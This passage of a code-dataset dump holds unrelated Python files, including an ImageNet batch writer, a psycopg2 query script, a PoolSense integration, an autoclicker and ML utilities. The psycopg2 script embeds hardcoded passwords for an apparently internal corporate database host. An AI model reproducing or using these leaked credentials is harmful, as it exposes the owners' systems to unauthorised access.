dtype=np.uint8)\n\n def __str__(self):\n pairs = map(lambda a: a[0] + ': ' + a[1],\n 
zip(self.__dict__.keys(),\n map(str, self.__dict__.values())))\n return \"\\n\".join(pairs)\n\n def write_csv_files(self):\n # Get the labels as the subdirs\n subdirs = glob(os.path.join(self.in_dir, '*'))\n labels = sorted(map(lambda x: os.path.basename(x), subdirs))\n indexes = range(len(labels))\n self.labels_dict = {k: v for k, v in zip(labels, indexes)}\n\n tlines = []\n vlines = []\n for subdir in subdirs:\n subdir_label = self.labels_dict[os.path.basename(subdir)]\n files = glob(os.path.join(subdir, self.file_pattern))\n np.random.shuffle(files)\n if self.class_samples_max is not None:\n files = files[:self.class_samples_max]\n lines = [(filename, subdir_label) for filename in files]\n v_idx = int(self.validation_pct * len(lines))\n tlines += lines[v_idx:]\n vlines += lines[:v_idx]\n\n np.random.shuffle(tlines)\n np.random.shuffle(vlines)\n\n if not os.path.exists(self.out_dir):\n os.makedirs(self.out_dir)\n\n for ff, ll in zip([self.train_file, self.val_file], [tlines, vlines]):\n with gzip.open(ff, 'wb') as f:\n f.write('filename,l_id\\n')\n for tup in ll:\n f.write('{},{}\\n'.format(*tup))\n f.close()\n\n # Write out cached stats for this data\n self.ntrain = (len(tlines) + self.batch_size - 1) / self.batch_size\n self.train_nrec = len(tlines)\n self.nval = (len(vlines) + self.batch_size - 1) / self.batch_size\n self.val_nrec = len(vlines)\n self.train_start = 0\n self.val_start = 10 ** int(np.log10(self.ntrain * 10))\n\n def parse_file_list(self, infile):\n import pandas as pd\n compression = 'gzip' if infile.endswith('.gz') else None\n df = pd.read_csv(infile, compression=compression)\n\n lk = filter(lambda x: x.startswith('l'), df.keys())\n tk = filter(lambda x: x.startswith('t'), df.keys())\n\n labels = {ll: np.array(df[ll].values, np.int32) for ll in lk}\n targets = np.array(df[tk].values, np.float32) if len(tk) > 0 else None\n imfiles = df['filename'].values\n\n self.nclass = {ll: (max(df[ll].values) + 1) for ll in lk}\n return imfiles, labels, targets\n\n def write_batches(self, name, start, labels, imfiles, targets=None,\n is_tar=False):\n pool = Pool(processes=self.num_workers)\n psz = self.batch_size\n osz = self.output_image_size\n npts = (len(imfiles) + psz - 1) / psz\n\n imfiles = [imfiles[i*psz: (i+1)*psz] for i in range(npts)]\n\n if targets is not None:\n targets = [targets[i*psz: (i+1)*psz].T.copy() for i in range(npts)]\n\n labels = [{k: v[i*psz: (i+1)*psz] for k, v in labels.iteritems()}\n for i in range(npts)]\n\n accum_buf = np.zeros((osz, osz, self.num_channels), dtype=np.int32)\n batch_mean = np.zeros(accum_buf.shape, dtype=np.uint8)\n logger.info(\"Writing %s batches...\", name)\n for i, jpeg_file_batch in enumerate(imfiles):\n t = time()\n if is_tar:\n jpeg_file_batch = [j.read() for j in jpeg_file_batch]\n jpeg_strings = pool.map(\n functools.partial(proc_img, is_string=is_tar), jpeg_file_batch)\n targets_batch = None if targets is None else targets[i]\n labels_batch = labels[i]\n bfile = os.path.join(self.out_dir, 'data_batch_%d' % (start + i))\n serialize({'data': jpeg_strings,\n 'labels': labels_batch,\n 'targets': targets_batch},\n bfile)\n logger.info(\"Wrote to %s (%s batch %d of %d) (%.2f sec)\",\n self.out_dir, name, i + 1, len(imfiles), time() - t)\n\n # get the means and accumulate\n imgworker.calc_batch_mean(jpglist=jpeg_strings, tgt=batch_mean,\n orig_size=osz, rgb=self.rgb,\n nthreads=self.num_workers)\n\n # scale for the case where we have an undersized batch\n if len(jpeg_strings) < self.batch_size:\n batch_mean *= len(jpeg_strings) / 
self.batch_size\n accum_buf += batch_mean\n pool.close()\n mean_buf = self.train_mean if name == 'train' else self.val_mean\n mean_buf[:] = accum_buf / len(imfiles)\n\n def save_meta(self):\n serialize({'ntrain': self.ntrain,\n 'nval': self.nval,\n 'train_start': self.train_start,\n 'val_start': self.val_start,\n 'macro_size': self.batch_size,\n 'train_mean': self.train_mean,\n 'val_mean': self.val_mean,\n 'labels_dict': self.labels_dict,\n 'val_nrec': self.val_nrec,\n 'train_nrec': self.train_nrec,\n 'nclass': self.nclass}, self.stats)\n\n def run(self):\n self.write_csv_files()\n namelist = ['train', 'validation']\n filelist = [self.train_file, self.val_file]\n startlist = [self.train_start, self.val_start]\n for sname, fname, start in zip(namelist, filelist, startlist):\n logger.info(\"%s %s %s\", sname, fname, start)\n if fname is not None and os.path.exists(fname):\n imgs, labels, targets = self.parse_file_list(fname)\n self.write_batches(sname, start, labels, imgs, targets)\n else:\n logger.info('Skipping %s, file missing', sname)\n self.save_meta()\n\n\nclass BatchWriterImagenet(BatchWriter):\n\n # code below adapted from Alex Krizhevsky's cuda-convnet2 library,\n # make-data.py\n # Copyright 2014 Google Inc. All rights reserved.\n #\n # Licensed under the Apache License, Version 2.0 (the \"License\");\n # you may not use this file except in compliance with the License.\n # You may obtain a copy of the License at\n #\n # http://www.apache.org/licenses/LICENSE-2.0\n #\n # Unless required by applicable law or agreed to in writing, software\n # distributed under the License is distributed on an \"AS IS\" BASIS,\n # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n # See the License for the specific language governing permissions and\n # limitations under the License.\n ##########################################################################\n\n def run(self):\n bsz = self.batch_size\n\n load_dir = self.in_dir\n # load_dir = os.path.join(os.path.expandvars(\n # os.path.expanduser(self.in_dir)), 'I1K')\n train_tar = os.path.join(load_dir, 'ILSVRC2012_img_train.tar')\n validation_tar = os.path.join(load_dir, 'ILSVRC2012_img_val.tar')\n devkit_tar = os.path.join(load_dir, 'ILSVRC2012_devkit_t12.tar.gz')\n self.url = \"http://www.image-net.org/download-imageurls\"\n for infile in (train_tar, validation_tar, devkit_tar):\n if not os.path.exists(infile):\n raise IOError(infile + \" not found. Please ensure you have\"\n \"ImageNet downloaded. 
More info here: \" +\n self.url)\n labels_dict, label_names, val_labels = self.parse_dev_meta(devkit_tar)\n self.labels_dict = labels_dict\n np.random.seed(0)\n with self.open_tar(train_tar, 'training tar') as tf:\n s_sets = tf.getmembers()\n s_tars = [tarfile.open(fileobj=tf.extractfile(s)) for s in s_sets]\n\n logger.info(\"Loaded synset tars.\")\n logger.info('Building trainset list ( can take a while)...')\n\n t_jpegfiles = []\n for i, st in enumerate(s_tars):\n if i % 100 == 0:\n pct_done = int(round((100.0 * i) / len(s_tars)))\n logger.info(\"%d%% ...\", pct_done)\n t_jpegfiles += [st.extractfile(m) for m in st.getmembers()]\n st.close()\n\n np.random.shuffle(t_jpegfiles)\n train_labels = [[labels_dict[j.name[:9]]] for j in t_jpegfiles]\n num_train_files = len(t_jpegfiles)\n logger.info(\"created list of jpg files\")\n logger.info(\"Number of training files = %d\", num_train_files)\n\n self.ntrain = (num_train_files + bsz - 1) / bsz\n self.train_nrec = num_train_files\n self.nclass = {'l_id': 1000}\n self.train_start = 0\n train_labels = {'l_id': np.array(train_labels, dtype=np.int32)}\n self.write_batches('train', self.train_start, train_labels,\n t_jpegfiles, targets=None, is_tar=True)\n\n with self.open_tar(validation_tar, 'validation tar') as tf:\n v_jpegfiles = sorted([tf.extractfile(m) for m in tf.getmembers()],\n key=lambda x: x.name)\n num_val_files = len(v_jpegfiles)\n\n self.nval = (num_val_files + bsz - 1) / bsz\n self.val_nrec = num_val_files\n self.val_start = 10 ** int(np.log10(self.ntrain) + 1)\n val_labels = {'l_id': np.array(val_labels, dtype=np.int32)}\n self.write_batches('validation', self.val_start, val_labels,\n v_jpegfiles, targets=None, is_tar=True)\n self.save_meta()\n\n def open_tar(self, path, name):\n if not os.path.exists(path):\n logger.error(\"ILSVRC 2012 %s not found at %s.\",\n \"Make sure to set ILSVRC_SRC_DIR correctly at the\",\n \"top of this file (%s).\" % (name, path, sys.argv[0]))\n sys.exit(1)\n return tarfile.open(path)\n\n def parse_dev_meta(self, ilsvrc_devkit_tar):\n tf = self.open_tar(ilsvrc_devkit_tar, 'devkit tar')\n fmeta = tf.extractfile(\n tf.getmember('ILSVRC2012_devkit_t12/data/meta.mat'))\n import scipy.io\n meta_mat = scipy.io.loadmat(StringIO(fmeta.read()))\n labels_dic = dict(\n (m[0][1][0], m[0][0][0][0] - 1) for m in meta_mat['synsets']\n if m[0][0][0][0] >= 1 and m[0][0][0][0] <= 1000)\n label_names_dic = dict(\n (m[0][1][0], m[0][2][0]) for m in meta_mat['synsets']\n if (m[0][0][0][0] >= 1 and m[0][0][0][0] <= 1000))\n label_names = [tup[1] for tup in sorted(\n [(v, label_names_dic[k]) for k, v in labels_dic.items()],\n key=lambda x:x[0])]\n\n fvgtruth = tf.extractfile(tf.getmember(\n 'ILSVRC2012_devkit_t12/data/' +\n 'ILSVRC2012_validation_ground_truth.txt'))\n vgtruth = [[int(line.strip()) - 1] for line in fvgtruth.readlines()]\n tf.close()\n return labels_dic, label_names, vgtruth\n\n\nif __name__ == \"__main__\":\n parser = argp.ArgumentParser()\n parser.add_argument('--config', help='Configuration File', required=True)\n parser.add_argument('--dataset', help='Dataset name', required=True)\n\n args = parser.parse_args()\n with open(args.config) as f:\n ycfg = yaml.load(f)[args.dataset]\n bw = BatchWriterImagenet(**ycfg)\n bw.run()\n","repo_name":"ominux/neon","sub_path":"neon/util/batch_writer.py","file_name":"batch_writer.py","file_ext":"py","file_size_in_byte":13785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"4"} +{"seq_id":"13818068233","text":"import psycopg2\n\n# # Settings 
for Alpha\n# HOST = \"tklid-monit0001.vm.mos.cloud.sbrf.ru\"\n# PORT = \"5433\"\n# DB_NAME = \"aiadviserdb\"\n# USER_1 = \"aiadviser_admin\"\n# PASSWORD_1 = \"aiadviser0TEST$Admin123\"\n# USER_2 = \"aiadviser\"\n# PASSWORD_2 = \"aiadviser0TEST$User123\"\n# USER = USER_1\n# PASSWORD = PASSWORD_1\n\n# Settings for test\nHOST = \"127.0.0.1\"\nPORT = \"5433\"\nDB_NAME = \"translation_memory_large\"\nUSER = \"postgres\"\nPASSWORD = \"100542\"\n\n\nconn = psycopg2.connect(\n user=USER,\n password=PASSWORD,\n host=HOST,\n port=PORT,\n database=DB_NAME\n)\n\ncursor = conn.cursor()\ntry:\n query_1 = \"\"\"\n SELECT table_name\n FROM information_schema.tables\n WHERE table_schema = 'public'\n ORDER BY table_name;\n \"\"\"\n cursor.execute(query_1)\n print('Done')\n records = cursor.fetchall()\n print(records)\n\n query_2 = \"\"\"\n SELECT *\n FROM cat_tmgroup\n \"\"\"\n cursor.execute(query_2)\n print('Done')\n records = cursor.fetchall()\n print(records)\n\n query_3 = \"\"\"\n SELECT \n table_name, \n column_name, \n data_type \n FROM \n information_schema.columns\n WHERE \n table_name = 'cat_tmgroup';\n \"\"\"\n cursor.execute(query_3)\n print('Done')\n records = cursor.fetchall()\n print(records)\n\n last_update = f\"to_timestamp('16-05-2011 15:36:38', 'dd-mm-yyyy hh24:mi:ss')\"\n query_4 = f\"\"\"\n SELECT cat_tmgroup.id, cat_tmgroup.updated_at, cat_sourceunit.text AS source, cat_translationunit.text AS translation \n FROM cat_tmunit \n INNER JOIN cat_translationunit \n ON cat_translationunit.id=cat_tmunit.translation_unit_id \n INNER JOIN cat_sourceunit \n ON cat_sourceunit.id=cat_tmunit.source_unit_id \n INNER JOIN cat_tmgroup \n ON cat_tmgroup.id=cat_tmunit.tm_group_id \n WHERE cat_tmunit.language_id IN (20, 72) AND cat_tmgroup.updated_at > {last_update};\n \"\"\"\n # query_4 = f\"\"\"\n # SELECT cat_tmunit.tm_group_id , cat_sourceunit.text AS source, cat_translationunit.text AS translation\n # FROM cat_tmunit\n # INNER JOIN cat_translationunit\n # ON cat_translationunit.id=cat_tmunit.translation_unit_id\n # INNER JOIN cat_sourceunit\n # ON cat_sourceunit.id=cat_tmunit.source_unit_id\n # \"\"\"\n cursor.execute(query_4)\n print('Done main')\n records = cursor.fetchall()\n print(records[:3])\n\n # query_5 = f\"\"\"\n # SELECT *\n # FROM cat_tmgroup\n # \"\"\"\n # cursor.execute(query_5)\n # print('Done 5')\n # records = cursor.fetchall()\n # print(records)\nexcept:\n print('Some problems')\nfinally:\n cursor.close()\n conn.close()\n\n\n","repo_name":"dmi3eva/katyas_zone","sub_path":"db/check_psycorpg.py","file_name":"check_psycorpg.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"22983083779","text":"# 7 time() 함수 써서 지금 몇시몇분인지 구하기\n\nimport time # time 모듈 불러와서 time() 쓸 수 있게 하기\n# time()은 1970 01 01 이후 흘러온 전체 초를 반환함\nfseconds = time.time() # 이 값은 float이다\n\n# 현재 시각은 24시, 60분을 넘겨 표시할 수 없음\nnowhrs = int((fseconds//(60*60))%24)\nif nowhrs > 12: # 12시간 표기 형식\n nowhrs -= 12\n nowhrs = \"오후 \" + str(nowhrs)\nelif nowhrs == 12:\n nowhrs = \"오후 \" + str(nowhrs)\nelif nowhrs < 12:\n nowhrs = \"오전 \" + str(nowhrs)\n \nnowmnts = int((fseconds//60)%60)\n\nprint(\"현재 시각(GMT):\", nowhrs+\"시\", str(nowmnts)+\"분\")\n","repo_name":"cuberisu/Practice","sub_path":"practice_3-7.py","file_name":"practice_3-7.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"75249326515","text":"\"\"\"The PoolSense 
integration.\"\"\"\nfrom datetime import timedelta\nimport logging\n\nimport async_timeout\nfrom poolsense import PoolSense\nfrom poolsense.exceptions import PoolSenseError\n\nfrom openpeerpower.config_entries import ConfigEntry\nfrom openpeerpower.const import CONF_EMAIL, CONF_PASSWORD\nfrom openpeerpower.core import OpenPeerPower\nfrom openpeerpower.helpers import aiohttp_client\nfrom openpeerpower.helpers.update_coordinator import (\n CoordinatorEntity,\n DataUpdateCoordinator,\n UpdateFailed,\n)\n\nfrom .const import DOMAIN\n\nPLATFORMS = [\"sensor\", \"binary_sensor\"]\n\n\n_LOGGER = logging.getLogger(__name__)\n\n\nasync def async_setup_entry(opp: OpenPeerPower, entry: ConfigEntry):\n \"\"\"Set up PoolSense from a config entry.\"\"\"\n\n poolsense = PoolSense(\n aiohttp_client.async_get_clientsession(opp),\n entry.data[CONF_EMAIL],\n entry.data[CONF_PASSWORD],\n )\n auth_valid = await poolsense.test_poolsense_credentials()\n\n if not auth_valid:\n _LOGGER.error(\"Invalid authentication\")\n return False\n\n coordinator = PoolSenseDataUpdateCoordinator(opp, entry)\n\n await coordinator.async_config_entry_first_refresh()\n\n opp.data.setdefault(DOMAIN, {})\n opp.data[DOMAIN][entry.entry_id] = coordinator\n\n opp.config_entries.async_setup_platforms(entry, PLATFORMS)\n\n return True\n\n\nasync def async_unload_entry(opp: OpenPeerPower, entry: ConfigEntry):\n \"\"\"Unload a config entry.\"\"\"\n unload_ok = await opp.config_entries.async_unload_platforms(entry, PLATFORMS)\n if unload_ok:\n opp.data[DOMAIN].pop(entry.entry_id)\n return unload_ok\n\n\nclass PoolSenseEntity(CoordinatorEntity):\n \"\"\"Implements a common class elements representing the PoolSense component.\"\"\"\n\n def __init__(self, coordinator, email, info_type):\n \"\"\"Initialize poolsense sensor.\"\"\"\n super().__init__(coordinator)\n self._unique_id = f\"{email}-{info_type}\"\n self.info_type = info_type\n\n @property\n def unique_id(self):\n \"\"\"Return a unique id.\"\"\"\n return self._unique_id\n\n\nclass PoolSenseDataUpdateCoordinator(DataUpdateCoordinator):\n \"\"\"Define an object to hold PoolSense data.\"\"\"\n\n def __init__(self, opp, entry):\n \"\"\"Initialize.\"\"\"\n self.poolsense = PoolSense(\n aiohttp_client.async_get_clientsession(opp),\n entry.data[CONF_EMAIL],\n entry.data[CONF_PASSWORD],\n )\n self.opp = opp\n self.entry = entry\n\n super().__init__(opp, _LOGGER, name=DOMAIN, update_interval=timedelta(hours=1))\n\n async def _async_update_data(self):\n \"\"\"Update data via library.\"\"\"\n data = {}\n with async_timeout.timeout(10):\n try:\n data = await self.poolsense.get_poolsense_data()\n except (PoolSenseError) as error:\n _LOGGER.error(\"PoolSense query did not complete\")\n raise UpdateFailed(error) from error\n\n return data\n","repo_name":"OpenPeerPower/core","sub_path":"openpeerpower/components/poolsense/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"34835702666","text":"# config.py\nfrom yacs.config import CfgNode as CN\n\n_C = CN()\n\n_C.WORK = CN()\n_C.WORK.PATH = \"\"\n\n_C.DATA = CN()\n_C.DATA.PATH = \"\"\n_C.DATA.PATH_TEST = \"\"\n_C.DATA.PATH_TRAIN = \"\"\n_C.DATA.FNAME_LABELS = \"\"\n\n_C.PRETRAINED = CN()\n_C.PRETRAINED.PATH = \"\"\n_C.PRETRAINED.FNAME_PREMODEL = \"\"\n\n_C.PROCESSED = CN()\n_C.PROCESSED.PATH = \"\"\n\n_C.OUTPUT = CN()\n_C.OUTPUT.PATH = \"\"\n\n_C.TRAIN = CN()\n_C.TRAIN.FRAC_FOR_TRAIN = 0.8\n_C.TRAIN.NUM_CLASSES = 
0\n_C.TRAIN.NUM_EPOCHS = 3\n_C.TRAIN.BATCH_SIZE = 100\n_C.TRAIN.LEARNING_RATE = 0.001\n_C.TRAIN.MOMENTUM = 0.9\n_C.TRAIN.STEP_SIZE = 7\n_C.TRAIN.GAMMA = 0.1\n\n_C.PREDICT = CN()\n_C.PREDICT.BATCH_SIZE = 100\n_C.PREDICT.MODEL_PATH = \"D:\\\\GitWork\\\\dog_breed\\\\pretrained\\\\\"\n_C.PREDICT.MODEL_FILE = 'resnet50_20200926-2053_t9175_v9339.pth'\n\n\ndef get_cfg_defaults():\n \"\"\"Get a yacs CfgNode object with default values for the project.\"\"\"\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern\n return _C.clone()","repo_name":"morpheus9631/dog_breed","sub_path":"configs/config_train_v3.py","file_name":"config_train_v3.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"31509786749","text":"import time\nimport threading\nimport win32api\nimport win32con\n\nmonke = int(input('input length of autoclicker: '))\ndef autoclick():\n \n \n delay = 0.02\n\n \n while not stop_flag:\n # Use the win32api and win32con modules to perform a left mouse click\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0)\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0)\n\n \n time.sleep(delay)\n\n\nstop_flag = False\n\n\nthreading.Thread(target=autoclick).start()\n\n\ntime.sleep(monke)\n\n\nstop_flag = not stop_flag\n","repo_name":"cybershinig4mi/AutoClickerOrganic","sub_path":"clicker.py","file_name":"clicker.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"17698460573","text":"#!/usr/bin/env python3\n\nimport glob\nimport os\nimport re\n\nfrom pyrocko.guts import Object, String, Dict, List\n\n\nclass TestResult(Object):\n package = String.T()\n branch = String.T(optional=True)\n box = String.T()\n py_version = String.T(optional=True)\n prerequisite_versions = Dict.T(\n String.T(), String.T(), optional=True, default={})\n log = String.T(optional=True, yamlstyle='|')\n result = String.T(optional=True)\n errors = List.T(String.T(), optional=True, default=[], yamlstyle='block')\n fails = List.T(String.T(), optional=True, default=[], yamlstyle='block')\n skips = List.T(String.T(), optional=True, default=[], yamlstyle='block')\n\n\ndef parse_result(res, package, box, fn):\n\n with open(fn, 'r') as f:\n txt = f.read()\n\n lines = txt.splitlines()\n for line in lines[:7]:\n pack, vers = line.split(': ')\n res.prerequisite_versions[pack] = vers\n\n txt = '\\n'.join(\n line for line in lines if not re.match(r'^Q\\w+::', line))\n txt = re.sub(r' +\\n', '\\n', txt)\n\n res.log = txt.strip()\n\n m = re.search(r'^=+ (.*) =+$', lines[-1], re.M)\n if m:\n if m.group(1).find('failed') != -1:\n res.result = 'FAILED (%s)' % m.group(1)\n else:\n res.result = 'OK (%s)' % m.group(1)\n\n count = {}\n for x in re.findall(r'^(.*) SKIPPED', txt, re.M):\n if x not in count:\n count[x] = 1\n else:\n count[x] += 1\n\n for x in sorted(count.keys()):\n res.skips.append('%s (%ix)' % (x, count[x]))\n\n for x in re.findall(r'^(.*) FAILED', txt, re.M):\n res.fails.append(x)\n\n\ndef iter_results():\n package = 'pyrocko'\n if os.path.exists('vagrant'):\n boxes = os.listdir('vagrant')\n\n else:\n boxes = [os.path.basename(os.path.abspath('.'))]\n os.chdir('../..')\n\n for box in sorted(boxes):\n\n fns = glob.glob(os.path.join('vagrant', box, 'test-*.py[23].out'))\n if fns:\n for fn in fns:\n m = re.search(r'/test-(.*)\\.py([23])\\.out$', fn)\n res = 
TestResult(package=package, branch=m.group(1), box=box)\n res.py_version = m.group(2)\n parse_result(res, package, box, fn)\n yield res\n\n else:\n res = TestResult(\n package=package, box=box,\n result='ERROR (running the tests failed)')\n\n yield res\n\n\nif __name__ == '__main__':\n for r in iter_results():\n print(r)\n","repo_name":"pyrocko/pyrocko","sub_path":"maintenance/vagrant_tests_collect.py","file_name":"vagrant_tests_collect.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"4"} +{"seq_id":"35022507025","text":"class Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n ans = []\n numLen = len(nums)\n def perm(n,cur):\n if len(cur) == numLen:\n if len(set(cur)) == numLen:\n ans.append(cur[:])\n return\n for i in range(numLen):\n # if nums[i] != nums[n]:\n cur.append(nums[i])\n perm(i, cur)\n cur.pop()\n perm(1,[])\n return ans","repo_name":"abelops/Competitive-Programming","sub_path":"0046-permutations/0046-permutations.py","file_name":"0046-permutations.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"6951700748","text":"import torch\nimport torch.nn as nn\n\nclass Model(nn.Module):\n def __init__(self,in_channel=3,out_channel=1):\n super(Model,self).__init__()\n self.pooling=nn.MaxPool2d((2,2))\n self.upsample=nn.Upsample(scale_factor=2,mode='bicubic')\n self.layer1=nn.Sequential(\n nn.Conv2d(in_channel,64,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64,64,3,1,1),\n nn.ReLU(inplace=True),\n )\n self.layer2=nn.Sequential(\n nn.Conv2d(64,128,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(128,128,3,1,1),\n nn.ReLU(inplace=True),\n )\n self.layer3=nn.Sequential(\n nn.Conv2d(128,256,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(256,256,3,1,1),\n nn.ReLU(inplace=True),\n )\n self.layer4=nn.Sequential(\n nn.Conv2d(256,256,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(256,256,3,1,1),\n nn.ReLU(inplace=True),\n )\n #concat[layer4_out,layer3_out]\n self.layer5=nn.Sequential(\n nn.Conv2d(512,128,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(128,128,3,1,1),\n nn.ReLU(inplace=True),\n )\n #concat[layer5_out,layer3_out]\n self.layer6=nn.Sequential(\n nn.Conv2d(256,64,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64,64,3,1,1),\n nn.ReLU(inplace=True),\n )\n #concat[layer5_out,layer3_out]\n self.layer7=nn.Sequential(\n nn.Conv2d(128,64,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64,64,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64,1,3,1,1),\n nn.Sigmoid()\n )\n\n def forward(self,x):\n x1=self.layer1(x)\n x1_pool=self.pooling(x1)\n\n x2=self.layer2(x1_pool)\n x2_pool=self.pooling(x2)\n\n x3=self.layer3(x2_pool)\n x3_pool=self.pooling(x3)\n\n x4=self.layer4(x3_pool)\n x4_pool=self.upsample(x4)\n\n x5=self.layer5(torch.cat([x4_pool,x3],dim=1))\n x5_pool=self.upsample(x5)\n\n x6=self.layer6(torch.cat([x5_pool,x2],dim=1))\n x6_pool=self.upsample(x6)\n\n x7=self.layer7(torch.cat([x6_pool,x1],dim=1))\n\n return x7\n\n\ndef main():\n model=Model().cuda()\n a=torch.randn((8,3,256,256)).cuda()\n y=model(a)\n print(a.shape,y.shape)\n \n\nif __name__ == '__main__':\n main()\n \n\n \n\n","repo_name":"helloful/ImageSeg","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"17090181634","text":"import os\nimport sys\nimport urllib.request\nfrom tqdm import 
tqdm\nfrom itertools import chain\nimport zipfile\nimport json\n\ndef downloadurltofile(url,filename):\n if not os.path.exists(filename):\n print(f'--> Downloading {filename} <--'.center(80, '#'))\n with open(filename, 'wb') as file:\n with urllib.request.urlopen(url) as resp:\n length = int(resp.getheader('content-length'))\n blocksize = max(4096, length // 100)\n with tqdm(total=length, file=sys.stdout) as pbar:\n while True:\n buff = resp.read(blocksize)\n if not buff:\n break\n file.write(buff)\n pbar.update(len(buff))\n print(' Download complete '.center(80,'#'))\n else:\n print(f'-->> {filename} file already exists locally <<--'.center(80, '#'))\n print()\n\ndef download(url,targetfolder,targetfile):\n path = os.getcwd()\n data_dir = os.path.abspath(os.path.join(path, targetfolder))\n\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n \n targetfile = os.path.join(data_dir, targetfile)\n downloadurltofile(url,targetfile)\n return data_dir,targetfile\n\ndef unzippedfile(folder,file):\n with zipfile.ZipFile(file, 'r') as zip_ref:\n zip_ref.extractall(folder)\n\ndef upload_data(workspace, datastore, src_dir, tgt_path):\n datastore.upload(\n src_dir=src_dir,\n target_path=tgt_path,\n show_progress=True)\n print(' Upload complete '.center(80,'#'))\n\ndef get_config(configfile):\n jsonfile = open(configfile)\n configdata = json.load(jsonfile)\n return configdata\n","repo_name":"manuelreyesgomez/ClaraCovidTranferLearningExample","sub_path":"ngccontent.py","file_name":"ngccontent.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"16960795323","text":"import torch\nfrom abc import ABC, abstractmethod\nfrom typing import (\n Tuple,\n Union,\n Dict,\n List,\n)\nfrom shell_data.utils.utils import knn_dist\nimport logging\n\n\nclass Buffer(ABC):\n @abstractmethod\n def add_data(self, data):\n pass\n\n @abstractmethod\n def get_data(self, batch_size):\n pass\n\n @abstractmethod\n def __len__(self):\n pass\n\n def is_empty(self):\n return len(self) == 0\n\n def update_tasks(self, task_idx):\n pass\n\n\nclass SupervisedLearningBuffer(Buffer):\n \"\"\"\n Infinite-size buffer for supervised learning tasks.\n Consisting of a tensor of features and a tensor of labels.\n \"\"\"\n\n def __init__(self, dim, task):\n super().__init__()\n self.dim = dim\n self.X = torch.empty(0, *dim)\n label_type = torch.long if task == 'classification' else torch.float\n self.y = torch.empty(0, dtype=label_type)\n\n def add_data(self, data, dedup=True):\n if dedup and len(self) > 0:\n data = self.dedup(data)\n x, y = data\n self.X = torch.cat((self.X, x))\n self.y = torch.cat((self.y, y))\n\n def dedup(self, data, ret_mask=False) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Process data and remove the data that is already in the buffer.\n\n Return a mask: true if the data is NOT in the buffer. False otherwise.\n \"\"\"\n if len(self) == 0:\n if ret_mask:\n return torch.ones(len(data[0]), dtype=torch.bool)\n return data\n\n x, y = data\n distances = knn_dist(x, self.X, k=1)\n # if distances = 0, then the data is already in the buffer and should be removed\n eps = 0.01 # HACK: because of floating point error\n mask = distances > eps\n logging.debug(f\"No. 
of duplicates: {len(mask) - mask.sum()}\")\n        if ret_mask:\n            return mask\n        return x[mask], y[mask]\n\n    def get_data(self, batch_size):\n        \"\"\"\n        Sample (without replacement) a batch of data from the buffer.\n        \"\"\"\n        batch_size = min(batch_size, len(self))\n        idx = torch.randperm(len(self.X))[:batch_size]\n        return self.X[idx], self.y[idx]\n\n    def __len__(self):\n        return len(self.X)\n\n    def save_buffer(self, path_name):\n        torch.save(self.X, f\"{path_name}_X.pt\")\n        torch.save(self.y, f\"{path_name}_y.pt\")\n\n    def load(self, path_name):\n        self.X = torch.load(f\"{path_name}_X.pt\")\n        self.y = torch.load(f\"{path_name}_y.pt\")\n\n\nclass ClassifcationBuffer(SupervisedLearningBuffer):\n    def __init__(self, dim, num_classes):\n        super().__init__(dim, 'classification')\n        self.num_classes = num_classes\n\n    def get_cls_counts(self):\n        # HACK: assume that the num_cls = 10\n        return {f\"cls_{i}\": (self.y == i).sum().item() for i in range(self.num_classes)}\n\n\nclass ReservoirSamplingClassificationBuffer(ClassifcationBuffer):\n    def __init__(self, dim, buffer_size, num_classes):\n        super().__init__(dim, num_classes)\n        self.buffer_size = buffer_size\n        self._buffer_weights = torch.zeros(0)\n\n    # https://avalanche-api.continualai.org/en/v0.1.0/_modules/avalanche/training/storage_policy.html#ReservoirSamplingBuffer\n    def add_data(self, data, dedup=True):\n        if len(data[0]) == 0:\n            return\n        if dedup and len(self) > 0:\n            data = self.dedup(data)\n        x, y = data\n        # self.X = torch.cat((self.X, x))\n        # self.y = torch.cat((self.y, y))\n        new_weights = torch.rand(len(x))\n        cat_weights = torch.cat([new_weights, self._buffer_weights])\n        cat_x = torch.cat([x, self.X])\n        cat_y = torch.cat([y, self.y])\n        sorted_weights, sorted_idxs = cat_weights.sort(descending=True)\n\n        buffer_idxs = sorted_idxs[:self.buffer_size]\n        self.X = cat_x[buffer_idxs]\n        